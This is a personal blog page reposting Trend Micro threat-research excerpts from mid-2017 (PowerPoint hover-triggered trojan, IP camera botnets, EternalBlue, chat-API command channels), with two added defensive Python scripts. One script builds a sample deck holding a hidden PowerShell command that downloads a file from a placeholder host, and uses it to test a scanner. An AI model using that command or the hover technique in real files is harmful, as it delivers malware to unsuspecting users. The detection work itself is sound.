Martijn Lammerts
My own digital place with a little of everything

Mouse Over, Macro: Spam Run in Europe Uses Hover Action to Deliver Banking Trojan

9 June 2017

We found another unique method being used to deliver malware—abusing the action that happens when simply hovering the mouse’s pointer over a hyperlinked picture or text in a PowerPoint slideshow. This technique is employed by a Trojan downloader (detected by Trend Micro as TROJ_POWHOV.A and P2KM_POWHOV.A), which we’ve uncovered in a recent spam email campaign in the EMEA region, especially organizations in the U.K., Poland, Netherlands, and Sweden. Affected industries include manufacturing, device fabrication, education, logistics, and pyrotechnics.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro
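As an added example (not code from the Trend Micro post), a small Python triage script that looks inside a .pptx for the construct the excerpt describes: an a:hlinkMouseOver (or a:hlinkClick) element whose action is ppaction://program, which tells PowerPoint to run the relationship target as a program instead of opening a hyperlink. The deck it scans is constructed here and is not the campaign's file; the PowerShell command line inside it is an assumption for illustration and points at a reserved example.invalid host. Only the standard library is used, so it runs offline.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import quote, unquote

# OOXML namespaces used by PresentationML slides and their relationship parts.
NS_A = "http://schemas.openxmlformats.org/drawingml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_P = "http://schemas.openxmlformats.org/presentationml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
R_ID = "{%s}id" % NS_R

# Hover/click actions with this scheme run a program instead of opening a link.
PROGRAM_ACTION = "ppaction://program"


def scan_pptx(data: bytes):
    """Return (slide part, event, action, decoded target) for every
    a:hlinkMouseOver / a:hlinkClick whose action launches a program.
    The command line lives in the slide's .rels part, keyed by r:id."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        slides = sorted(n for n in names if re.fullmatch(r"ppt/slides/slide\d+\.xml", n))
        for slide in slides:
            rels_part = slide.replace("ppt/slides/", "ppt/slides/_rels/") + ".rels"
            rels = {}
            if rels_part in names:
                for rel in ET.fromstring(z.read(rels_part)):
                    rels[rel.get("Id")] = rel.get("Target", "")
            root = ET.fromstring(z.read(slide))
            for event in ("hlinkMouseOver", "hlinkClick"):
                for el in root.iter("{%s}%s" % (NS_A, event)):
                    action = el.get("action", "")
                    if action.startswith(PROGRAM_ACTION):
                        target = unquote(rels.get(el.get(R_ID), ""))
                        findings.append((slide, event, action, target))
    return findings


def build_sample_pptx() -> bytes:
    """Constructed minimal deck (not a real sample): one text run with a
    mouse-over action that hands a PowerShell command line to PowerPoint.
    Only the parts the scanner reads are written, so it is not openable."""
    slide_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:p="{NS_P}" xmlns:a="{NS_A}" xmlns:r="{NS_R}">
  <p:cSld><p:spTree>
    <p:sp><p:txBody><a:p><a:r>
      <a:rPr lang="en-US">
        <a:hlinkMouseOver r:id="rId2" action="{PROGRAM_ACTION}"/>
      </a:rPr>
      <a:t>Loading, please wait</a:t>
    </a:r></a:p></p:txBody></p:sp>
  </p:spTree></p:cSld>
</p:sld>"""
    # Assumed command line for illustration; the host is reserved and resolves nowhere.
    cmd = ("powershell -NoP -W Hidden -c \"(New-Object Net.WebClient)"
           ".DownloadFile('http://example.invalid/x.jse','%TEMP%\\x.jse')\"")
    rels_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{NS_REL}">
  <Relationship Id="rId2" Type="{NS_R}/hyperlink" Target="{quote(cmd)}" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("ppt/slides/slide1.xml", slide_xml)
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for slide, event, action, target in scan_pptx(build_sample_pptx()):
        print(f"{slide}: {event} {action} -> {target}")
```

Treat any ppaction://program hit in an e-mailed deck as suspicious; legitimate presentations almost never need it. The hover only fires while the deck is in slideshow mode, and Protected View on a file that came in by e-mail keeps the action from running until the user leaves it, so this is a triage check for attachments, not a replacement for those controls.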

The Reigning King of IP Camera Botnets and its Challengers

8 June 2017

Early this month we discussed a new Internet of Things (IoT) botnet called Persirai (detected by Trend Micro as ELF_PERSIRAI.A), which targets over 1000 Internet Protocol (IP) camera models. Currently, through Shodan and our own research, we see that 64% of tracked IP cameras with custom http servers are infected with Persirai. But, because these cameras are such common targets, there is some competition between malware.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

June’s Android Security Bulletin Addresses Critical Vulnerabilities in Media Framework and Qualcomm Components

8 June 2017

Google recently released their June security bulletin for Android, which addresses critical vulnerabilities found in Media framework, as well as various critical vulnerabilities that are based on Qualcomm components. As with previous Android security updates, this month’s bulletin is available via over-the-air updates for native Android devices or via service providers and manufacturers for non-native devices.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Victim Machine has joined #general: Using Third-Party APIs as C&C Infrastructure

6 June 2017

Imagine a well-experienced security analyst at a major company going through his normal routine of checking logs at the end of the workday. A quick look at the company’s security solution logs reveals nothing too peculiar or alarming — except for one thing: a higher than normal amount of traffic to the office’s newly introduced third-party chat platform.

He doesn’t give this much thought. After all, the company’s been pushing to have the chat platform as the main office communication tool, so it makes sense that there’d be more traffic than usual. The security analyst calls it a day and goes home.

On the way home, however, he gets an alert: the security scanner has detected a potential security issue. He returns to the office and finds what appears to be the cause: a machine was flagged downloading known malicious files, which were then caught by the company’s security solution. Again, nothing too strange, but he decides to investigate just what triggered the malicious behavior.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro
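Turning the "higher than normal amount of traffic" observation in the scenario above into a check, as an added example that is not part of the Trend Micro post: per-host request counts to the chat platform's domain are pulled from proxy log lines, and a host whose count sits far from the fleet median (modified z-score on median and MAD, so one noisy host cannot drag the baseline) is flagged. The log format, the hostnames and the chat.example.com domain are assumptions, and the lines are constructed here rather than captured traffic.

```python
import re
from statistics import median

# Assumed proxy log layout: "<timestamp> <src_host> <dst_host> <status> <bytes>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<status>\d{3}) (?P<bytes>\d+)$")


def parse(lines):
    """Yield a dict per well-formed line; malformed lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield m.groupdict()


def requests_per_host(records, domain):
    """Count requests per source host whose destination is the chat platform
    (the domain itself or any subdomain, e.g. its API endpoint)."""
    counts = {}
    for r in records:
        dst = r["dst"].lower()
        if dst == domain or dst.endswith("." + domain):
            counts[r["src"]] = counts.get(r["src"], 0) + 1
    return counts


def outliers(counts, threshold=3.5):
    """Modified z-score per host: 0.6745 * (count - median) / MAD.
    Returns {host: score} for hosts above the threshold (3.5 is the usual cut)."""
    values = list(counts.values())
    if len(values) < 3:          # no meaningful baseline from one or two hosts
        return {}
    med = median(values)
    mad = median(abs(v - med) for v in values) or 1.0   # avoid dividing by a MAD of 0
    scores = {h: 0.6745 * (c - med) / mad for h, c in counts.items()}
    return {h: round(s, 2) for h, s in scores.items() if s > threshold}


def detect(lines, domain="chat.example.com"):
    """Run the whole pipeline over raw log lines."""
    return outliers(requests_per_host(parse(lines), domain))


def build_sample_log():
    """Constructed proxy log (not real traffic): four workstations make a few
    requests each to the chat platform; one makes a small API call every minute."""
    lines = []
    baseline = {"ws-fin-01": 4, "ws-fin-02": 3, "ws-hr-03": 5, "ws-ops-04": 4}
    for host, n in baseline.items():
        for i in range(n):
            lines.append(f"2017-06-05T17:{i * 7:02d}:15 {host} chat.example.com 200 {1300 + i}")
    for minute in range(40):
        lines.append(f"2017-06-05T17:{minute:02d}:00 ws-eng-07 api.chat.example.com 200 412")
    lines.append("2017-06-05T17:05:00 ws-fin-01 www.example.org 200 9000")   # unrelated destination
    lines.append("garbage line that should be skipped")
    return lines


if __name__ == "__main__":
    for host, score in detect(build_sample_log()).items():
        print(f"{host}: modified z-score {score}")
```

Volume is the weakest of the available signals: the host that stands out here would also stand out on the regularity of its requests and on their constant size, and the scenario makes the point that a platform rollout is exactly when a company-wide baseline moves, so keep the baseline per role or department rather than for the whole fleet.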

MS17-010: EternalBlue’s Large Non-Paged Pool Overflow in SRV Driver

2 June 2017

The EternalBlue exploit took the spotlight this month as it became the tie that bound the spate of malware attacks these past few weeks—the pervasive WannaCry, the fileless ransomware UIWIX, the Server Message Block (SMB) worm EternalRocks, and the cryptocurrency mining malware Adylkuzz.

EternalBlue (patched by Microsoft via MS17-010) is a security flaw related to how a Windows SMB 1.0 (SMBv1) server handles certain requests. If successfully exploited, it can allow attackers to execute arbitrary code in the target system. The severity and complexity of EternalBlue, alongside the other exploits released by hacking group Shadow Brokers, can be considered medium to high.

We further delved into EternalBlue’s inner workings to better understand how the exploit works and provide technical insight on the exploit that wreaked havoc among organizations across various industries around the world.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Red on Red: The Attack Landscape of the Dark Web

30 May 2017

We’ve frequently talked about how limited-access networks such as the Dark Web are home to various cybercriminal underground hotspots. Hosted and accessed via the Tor network, these sites house underground marketplaces that sell various goods and services, which include cryptocurrency laundering, hosting platforms for malware, and stolen/counterfeit identities.

What is less covered is the attack landscape within the Dark Web. Are these sites subject to their own hacking attempts and DDoS attacks? What are the sizes and characteristics of attacks within the Dark Web? This is what we have learned: these attacks are surprisingly common within the Dark Web, and are frequently carried out manually and aimed at subverting or spying on the services run by other cybercriminals.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Yara Used to RickRoll Security Researchers

26 May 2017

For most security researchers, Yara, a tool that allows them to create their own set of rules for malware tracking, is an invaluable resource that helps automate many processes. However, despite Yara’s reliability, it shouldn’t be the only tool used to monitor new versions of malware.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro
